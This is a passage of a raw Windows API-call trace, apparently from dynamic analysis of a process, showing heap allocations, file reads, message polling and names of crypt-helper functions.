(in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0090.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0090.063] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0090.063] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0090.063] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0090.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0090.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0090.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0090.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0090.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0090.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0090.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0090.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0090.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0090.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0090.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0090.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0090.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0090.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e02020 [0090.108] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0090.108] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0090.110] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x744a, lpOverlapped=0x0) returned 1 [0090.111] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0090.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0090.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0090.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0090.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0090.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1744a) returned 0x4516010 [0090.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e02020 | out: hHeap=0x1780000) returned 1 [0090.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0090.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0090.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0090.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0090.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0090.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1744a) returned 0x452d468 [0090.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0090.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0090.131] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 1 [0090.131] TranslateMessage (lpMsg=0x144f2dc) returned 0 [0090.131] DispatchMessageW (lpMsg=0x144f2dc) returned 0x0 [0090.131] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0090.131] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0090.131] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0090.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0090.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0090.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0090.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0090.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1744a) returned 0x4516010 [0090.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0090.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0090.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0090.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0090.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0090.131] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0090.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0090.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0090.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0090.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0090.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0090.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0090.132] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0090.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0090.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0090.132] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0090.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0090.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0090.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0090.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2470 [0090.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0090.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0090.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0090.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0090.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1744a) returned 0x4516010 [0090.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2480 [0090.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0090.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0090.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0090.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0090.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0090.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0090.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0090.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24f0 [0090.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0090.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0090.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0090.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca460 [0090.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0090.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0090.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0090.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0090.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0090.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1744a) returned 0x499a008 [0090.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0090.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0090.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0090.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0090.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0090.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0090.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0090.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0090.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0090.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0090.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0090.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0090.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0090.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0090.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0090.134] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0090.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0090.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0090.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0090.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0090.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0090.134] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0090.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0090.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0090.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0090.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0090.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0090.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0090.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0090.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0090.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0090.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0090.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0090.135] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0090.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0090.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0090.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0090.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2650 [0090.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0090.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0090.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0090.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0090.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca400 [0090.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0090.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0090.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0090.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0090.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0090.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0090.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0090.135] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0090.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0090.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0090.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0090.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0090.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0090.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0090.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0090.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0090.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0090.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0090.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0090.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0090.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0090.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0090.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0090.136] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0090.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0090.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0090.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0090.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0090.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0090.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0090.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0090.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0090.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0090.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0090.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0090.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0090.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0090.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0090.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0090.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0090.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0090.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0090.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0090.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0090.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0090.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0090.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0090.137] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0090.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0090.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0090.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0090.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0090.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0090.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0090.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0090.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0090.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0090.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0090.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0090.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0090.137] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0090.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0090.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca238 [0090.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0090.138] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0090.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0090.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0090.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0090.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0090.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0090.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0090.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0090.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0090.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0090.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0090.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0090.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0090.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0090.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0090.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0090.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0090.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0090.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0090.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0090.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0090.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0090.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0090.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0090.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0090.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0090.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0090.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0090.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0090.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0090.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0090.139] RtlAllocateHeap 